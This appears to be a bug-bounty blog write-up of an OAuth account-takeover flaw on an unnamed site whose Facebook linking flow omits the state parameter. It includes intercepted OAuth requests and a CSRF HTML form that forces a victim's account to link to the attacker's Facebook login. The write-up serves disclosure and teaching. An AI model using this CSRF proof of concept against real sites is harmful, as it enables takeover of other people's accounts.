State Parameter Mising Bug- OAuth Misconfiguration
Vulnerability -Account takeover using OAuth Misconfiguration
State Parameter Importance:
Authorization protocols provide a "State" parameter that allows you to restore the previous state of your application. The state parameter preserves some state objects set by the client in the Authorization request and makes it available to the client in the response.
CSRF attacks
The primary reason for using the state parameter is to mitigate CSRF attacks by using a unique and non-guessable value associated with each authentication request about to be initiated. That value allows you to prevent the attack by confirming that the value coming from the response matches the one you sent.
The state parameter is a string so you can encode any other information in it. You send a random value when starting an authentication request and validate the received value when processing the response. You store something on the client application side (in cookies, session, or localstorage) that allows you to perform the validation. If you receive a response with a state that doesn't match, you can infer that you may be the target of an attack because this is either a response for an unsolicited request or someone trying to forge the response.
A CSRF attack specifically targets state-changing requests to initiate an action instead of getting user data because the attacker has no way to see the response to the forged request. For the most basic cases the state parameter should be a nonce, used to correlate the request with the response received from the authentication.
Most modern OIDC and OAuth2 SDKs, including Auth0.js in single-page applications, handle the state generation and validation automatically
Vulnerability Description
OAuth 2.0 is an authorization framework for Web Application. It validates the identity of a user to the website which requested it without disclosing passwords to the website. Vulnerability in OAuth flow leads to takeover of victim account .
Impact
An attacker can take over the account of the victim
Overview:
Sorry guys i can’t disclose the name of the company , so we can call it as redacted.com. Let’s look at the website https://www.redacted.com, so the website looks like a normal site,nothing interesting in homepage so I go to the Signup page and got a page like shown below.
I created an account using my temporary mail and completed the email confirmation and logged into my account. There will be an option for linking the radacted.com account to Facebook or Google.This will make it easy to login into the redacted account by using Oauth functionality.
What is Oauth….:???
Oauth :- OAuth stands for Open Authorization Framework and is the industry-standard delegation protocol for authorization. OAuth 2.0 is widely used by applications (e.g. SaaS platforms) to access your data that is already on the Internet. That includes for example your contacts list on Google, your friends list on Facebook, etc. If you were ever asked by web or mobile application to give permissions to access your personal data, you have probably used OAuth 2.0.
When I saw this option i just open Burpsuite and clicked the Facebook icon for linking my account to Facebook and intercept the request and response.
So the first request will be like this :
GET /v3.1/dialog/oauth?response_type=code&redirect_uri=https%3A%2F%2Fredacted.com%2Fauth%2Ffacebook%2Fcallback&scope=email%2Cpublic_profile&client_id=00000000000 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://redacted.com/profile
Cookie: fr=0rqajcCy4gEh2nJvS.redactedPv2OYVcelE.AWVp7-tG; sb=OQwFXNTRCDFUcookieLIw0; datr=OQwFXBW2scookieSe4q; wd=1366XXXXX657; locale=en_GB; c_u
Connection: close
when I saw this request I felt something interesting here because there is no state parameter, which means some time it may be vulnerable to csrf attack. Now there will be a Facebook page popup for authentication. I was successfully authenticated to Facebook, then i intercept the callback from Facebook….when i saw the callback, i wondered…there is no state parameter which means there is no protection from a csrf attack, so let’s exploit that.
GET /auth/facebook/callback?code=AQCXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.facebook.com
Cookie: __cfduid=d27690xxxxxxxxxxxxxxxxxxxxxxxxxxx471; __adroll_fpc=074645xxxxxxxxxxxxxxxxxxxxxxxx2e9; __ar_v4=JYUExxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf-cb8d-4c87–9bc1–8478a3f6ed68=session_a0xxxxxxxxxxxxxxxxxxb9e6; _fbp=fb.1.154xxxxxxxxx719436
Connection: close
When I saw this callback,I just made a csrf html page called attack.html.
<html>
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”https://redacted.com/auth/facebook/callback">
<input type=”hidden” name=”code” value=”AxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxY” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
Now we can test this vulnerability on a victim account, I created another redacted.com test account. After that logged into that account on an another browser and went to the settings page, there is an option for the linking the Facebook account. Now i just open the the html page on a new tab and clicked the submit button….Yes!…I got it….
My Facebook account is successfully linked with the victim redacted account ππ…..for cross checking, i logged out from the victim redacted.com account and tried to login with my Facebook account on redacted.com….Yeah…. ππits successfully logged in with my Facebook account…so i can takeover any victim account….its a simple Oauth Misconfiguration lead to full account takeover.
Tools to use:
Generate CSRF PoC in Burp Suite
You can use this https://security.love/CSRF-PoC-Genorator/ to generate CSRF PoC (If you don’t have BurpSuite Pro)
0 comments:
Post a Comment